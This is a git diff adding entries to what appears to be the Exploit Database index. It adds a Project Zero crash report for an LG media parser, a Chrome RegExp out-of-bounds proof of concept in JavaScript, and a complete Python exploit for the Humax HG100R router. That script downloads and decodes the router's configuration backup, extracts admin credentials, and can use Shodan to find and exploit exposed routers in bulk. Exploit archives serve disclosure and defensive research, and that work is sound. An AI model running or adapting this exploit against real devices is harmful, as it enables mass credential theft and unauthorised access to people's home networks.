diff --git a/files.csv b/files.csv index 7ce380c17..74a2d57ab 100644 --- a/files.csv +++ b/files.csv @@ -5603,6 +5603,8 @@ id,file,description,date,author,platform,type,port 42277,platforms/freebsd_x86/dos/42277.c,"FreeBSD - 'FGPU' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0 42278,platforms/freebsd_x86/dos/42278.c,"FreeBSD - 'FGPE' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0 42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0 +42285,platforms/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",android,dos,0 +42286,platforms/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -15676,7 +15678,7 @@ id,file,description,date,author,platform,type,port 42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443 42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80 42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000 -42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - web shell upload (Metasploit)",2017-06-29,Metasploit,java,remote,0 +42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -38101,3 +38103,4 @@ id,file,description,date,author,platform,type,port 42263,platforms/php/webapps/42263.txt,"WordPress Plugin Ultimate Product Catalogue 4.2.2 - SQL Injection",2017-06-27,"Lenon Leite",php,webapps,0 42268,platforms/windows/webapps/42268.py,"Easy File Sharing Web Server 7.2 - Unrestricted File Upload",2017-06-28,Chako,windows,webapps,0 42269,platforms/linux/webapps/42269.txt,"Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities",2017-06-28,"Core Security",linux,webapps,0 +42284,platforms/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps,0 diff --git a/platforms/android/dos/42285.txt b/platforms/android/dos/42285.txt new file mode 100755 index 000000000..9f36b2a49 --- /dev/null +++ b/platforms/android/dos/42285.txt @@ -0,0 +1,26 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1226 + +There are three variants of the below crash, all of which stemming from an unbound copy into a fixed size stack buffer allocated in the function ASFParser::SetMetaData, used as an argument to each of the three calls to the function unicodeToUtf_8 without checking that the output length will be less than the size of the buffer. You can see in the crashdump that the argv array has been overwritten by junk unicode output, resulting in the corrupted binary path displayed in the output. + +I believe that this issue is mitigated by compiling with stack cookies, so I'm not applying the 90 day deadline to this issue since I don't think it's exploitable except as a denial-of-service. + +*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** +Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys' +Revision: '11' +ABI: 'arm' +pid: 435, tid: 435, name: mediaserver >>> �ు둢吟ѷἃ舄㹂慮춎䇛㾾攞䎤➹뽉龂팆顯浃桡>￿큾略혭拴畹㿺㬭똦৿➦쎪悸ꪰ뒇᭥릧㠙���褓悀䳘牀⛕鑆ࡢ���㹇䊌⾩ʘỬ操陊ꦑ䤮峇ᇱ빌屸쒫羮죾‘궈砜톢庋_䔗蛴ᰦ꿚肁࿗砘搒깷옮豩烙켯펤傁䅥툺帰Ŧ䥎ᢘ퐢옥ꤤࠨ᪗@���Ԃ깛Ȯ댁ૃ⒨待讍ꄌ鈤䄚戬㸵Ṣ䙌䠖咂徕琣༔ৰ씊塀⏆ð厔⁀呕!谀櫰ុì⪌跔띦䳊薵結စ䌷﷌���๑髇#쀇붭 +signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xff951000 + r0 ff951002 r1 f023b0ba r2 0000100e r3 ffffff8f +AM write failed: Broken pipe + r4 00000792 r5 f023bfde r6 f5f1c080 r7 efdfca69 + r8 f1282348 r9 ff94fc70 sl f1282348 fp 00000012 + ip 0000a3c6 sp ff94fc5c lr efdf7457 pc efdf4a9a cpsr 800f0030 + +backtrace: + #00 pc 00003a9a /system/lib/liblg_parser_asf.so (_Z14unicodeToUtf_8PhPti+85) + #01 pc 00006453 /system/lib/liblg_parser_asf.so (_ZN9ASFParser11SetMetaDataEP15meta_descriptor+186) + #02 pc 6b203432 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42285.zip diff --git a/platforms/hardware/webapps/42284.py b/platforms/hardware/webapps/42284.py new file mode 100755 index 000000000..4a6e2f47e --- /dev/null +++ b/platforms/hardware/webapps/42284.py @@ -0,0 +1,90 @@ +# coding: utf-8 + +# Exploit Title: Humax Backup file download +# Date: 29/06/2017 +# Exploit Author: gambler +# Vendor Homepage: http://humaxdigital.com +# Version: VER 2.0.6 +# Tested on: OSX Linux +# CVE : CVE-2017-7315 + +import sys +import base64 +import shodan +import requests +import subprocess + +def banner(): + print ''' + ██░ ██ █ ██ ███▄ ▄███▓ ▄▄▄ ▒██ ██▒ +▓██░ ██▒ ██ ▓██▒▓██▒▀█▀ ██▒▒████▄ ▒▒ █ █ ▒░ +▒██▀▀██░▓██ ▒██░▓██ ▓██░▒██ ▀█▄ ░░ █ ░ +░▓█ ░██ ▓▓█ ░██░▒██ ▒██ ░██▄▄▄▄██ ░ █ █ ▒ +░▓█▒░██▓▒▒█████▓ ▒██▒ ░██▒ ▓█ ▓██▒▒██▒ ▒██▒ + ▒ ░░▒░▒░▒▓▒ ▒ ▒ ░ ▒░ ░ ░ ▒▒ ▓▒█░▒▒ ░ ░▓ ░ + ▒ ░▒░ ░░░▒░ ░ ░ ░ ░ ░ ▒ ▒▒ ░░░ ░▒ ░ + ░ ░░ ░ ░░░ ░ ░ ░ ░ ░ ▒ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ + ''' + print 'Description: Humax HG100R backup file download' + print 'Software Version: VER 2.0.6' + print 'SDK Version: 5.7.1mp1' + print 'IPv6 Stack Version: 1.2.2' + print 'Author: Gambler' + print 'Vulnerability founded: 14/03/2016' + print 'CVE: waiting' + print + +def xplHelp(): + print 'Exploit syntax error, Example:' + print 'python xpl.py http://192.168.0.1' + +def exploit(server): + path = '/view/basic/GatewaySettings.bin' + if not server.startswith('http'): + server = 'http://%s' % server + if server.endswith('/'): + server = server[:-1]+'' + url = '%s/%s' %(server,path) + print '[+] - Downloading configuration file and decoding' + try: + r = requests.get(url, stream=True,timeout=10) + for chunk in r.iter_content(chunk_size=1024): + if chunk: + rawdata = r.content + save(rawdata) + except: + pass + +def save(rawdata): + config = base64.b64decode(rawdata).decode('ascii','ignore').replace('^@','') + open('config.txt', 'w').write(config) + print '[+] - Done, file saved as config.txt' + infos = subprocess.Popen(["strings config.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0] + print '[+] - Credentials found' + print infos + +def shodanSearch(): + SHODAN_API_KEY = "SHODAN_API_KEY" + api = shodan.Shodan(SHODAN_API_KEY) + try: + results = api.search('Copyright © 2014 HUMAX Co., Ltd. All rights reserved.') + print 'Results found: %s' % results['total'] + for result in results['matches']: + router = 'http://%s:%s' % (result['ip_str'],result['port']) + print router + exploit(router) + except shodan.APIError, e: + print 'Error: %s' % e + + +if __name__ == '__main__': + + if len(sys.argv) < 2: + xplHelp() + sys.exit() + banner() + if sys.argv[1] == 'shodan': + shodanSearch() + else: + exploit(sys.argv[1]) diff --git a/platforms/multiple/dos/42286.txt b/platforms/multiple/dos/42286.txt new file mode 100755 index 000000000..a39858b5e --- /dev/null +++ b/platforms/multiple/dos/42286.txt @@ -0,0 +1,22 @@ +There is an out-of-bounds access in RegExp.prototype.exec and RegExp.prototype.test. The code defined in BranchIfFastRegExp checks whether a regular expression object has the default map, however, it is possible to alter the map after this check has been performed. This can cause inline fields, such as lastIndex to be changed to dictionary properties. This will cause out-of-bounds reads and writes the next time lastIndex is accessed on the fast path. + +A minimal PoC is as follows, and two full PoCs (one for test and one for exec) are attached. + +var re; +function f(){ + for(var i = 0; i < 100; i++){ + re["test" + i] = 0x77777777; // make a dict + } +return 0; +} + +re = /-/g; +var str = '2016-01-02'; +re.lastIndex = {valueOf : f}; +result = re.exec(str); + +This PoC crashes on google-chrome-beta on Linux. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42286.zip